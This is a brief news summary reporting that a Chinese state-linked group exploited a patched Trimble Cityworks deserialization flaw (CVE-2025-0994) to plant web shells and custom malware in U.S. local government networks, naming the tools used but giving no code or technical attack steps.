<ul><li>Chinese state-linked threat group UAT-6382 exploited a deserialization vulnerability in Trimble Cityworks software to compromise U.S. local government networks.</li><li>The vulnerability, CVE-2025-0994, despite being patched, has been leveraged since January by UAT-6382 to breach municipal systems and deploy Chinese-language web shells and custom malware focused on utility networks.</li><li>UAT-6382 used tools like AntSword, Chopper, Behinder, and a Rust-based malware loader named TetraLoader to maintain access, steal sensitive files, and implant backdoors across compromised environments.</li><li>Indicators of compromise (IOCs) have been released by Cisco Talos to help organizations detect and defend against similar intrusions, highlighting the threat posed by APTs targeting critical infrastructure through known vulnerabilities.</li></ul>

Chinese Hackers exploit Trimble Cityworks flaw to infiltrate U.S. Local Government Systems

Discover more